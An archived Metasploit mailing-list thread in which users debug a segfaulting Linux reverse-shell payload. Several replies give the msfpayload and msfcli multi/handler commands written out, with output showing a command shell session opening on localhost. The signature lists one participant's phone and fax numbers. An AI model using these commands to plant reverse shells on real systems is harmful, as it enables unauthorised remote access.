Metasploit mailing list archives
Re: Linux payloads broken
From: Florian Roth <Neo.X () web de>
Date: Fri, 07 May 2010 18:05:18 +0200
It seems to me that Ramon is right. I get the same segmentation fault message and the kernel as the OS is similar to yours. BUT - with a listening handler - everything works out fine. --- Term 1 neo@ubuntu:/hack/framework3$ ./msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=80 X >out.elf Created by msfpayload (http://www.metasploit.com). Payload: linux/x86/shell_reverse_tcp Length: 71 Options: LHOST=127.0.0.1,LPORT=80 neo@ubuntu:/hack/framework3$ ./out.elf Segmentation fault neo@ubuntu:/hack/framework3$ file out.elf out.elf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size neo@ubuntu:/hack/framework3$ uname -a Linux ubuntu 2.6.32-22-generic #33-Ubuntu SMP Wed Apr 28 13:27:30 UTC 2010 i686 GNU/Linux --- Term 2 neo@ubuntu:/hack/framework3$ sudo ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=80 E [sudo] password for neo: [*] Please wait while we load the module tree... --- Term 1 neo@ubuntu:/hack/framework3$ ./out.elf --- Term 2 [*] Started reverse handler on 127.0.0.1:80 [*] Starting the payload handler... [*] Command shell session 1 opened (127.0.0.1:80 -> 127.0.0.1:49928) ---------------- I used svn r9101 updated 20 days ago (2010.04.17) So please check again if the handler is set right and nothing interferes with the reverse connect. Best, Florian On Fri, 2010-05-07 at 18:00 +0300, Konrads Smelkovs wrote:
Strace shows that it segfaults before any syscalls are placed. furthermore, it appears that exec headers are corrupt. wether I have listener or not on the other end doesn't matter. -- Konrads Smelkovs Applied IT sorcery. On Fri, May 7, 2010 at 3:53 PM, Ramon de Carvalho Valle <ramon () metasploit com> wrote: Did you set a listener on the selected port? -Ramon On 05/07/2010 05:21 AM, Konrads Smelkovs wrote: > konrads@konrads-laptop:~/msf2$ ./msfpayload linux/x86/shell_reverse_tcp > LHOST=127.0.0.1 LPORT=80 X >out.elf > Created by msfpayload (http://www.metasploit.com). > Payload: linux/x86/shell_reverse_tcp > Length: 71 > Options: LHOST=127.0.0.1,LPORT=80 > konrads@konrads-laptop:~/msf2$ file out.elf > out.elf: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), > statically linked, *corrupted section header size* > konrads@konrads-laptop:~/msf2$ chmod +x out.elf > konrads@konrads-laptop:~/msf2$ ./out.elf > *Segmentation fault* > konrads@konrads-laptop:~/msf2$ uname -a > Linux konrads-laptop 2.6.31-20-generic #58-Ubuntu SMP Fri Mar 12 05:23:09 > UTC 2010 i686 GNU/Linux > > > Same for metsvc_reverse_tcp payload > -- > Konrads Smelkovs > Applied IT sorcery. > > > > > _______________________________________________ > https://mail.metasploit.com/mailman/listinfo/framework _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
-- Sincerely Saludos cordiales Mit freundlichen Grüßen Florian Roth Tel: +49 06251 - 827 9402 Mobil: +49 175 - 7240 363 Fax: +49 12125 - 11699510 eMail: Florian.Roth () email de _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Linux payloads broken Konrads Smelkovs (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)
- Re: Linux payloads broken Konrads Smelkovs (May 07)
- Re: Linux payloads broken Florian Roth (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)
- Re: Linux payloads broken egypt (May 07)
- Re: Linux payloads broken Konrads Smelkovs (May 08)
- Re: Linux payloads broken Konrads Smelkovs (May 07)
- Re: Linux payloads broken Ramon de Carvalho Valle (May 07)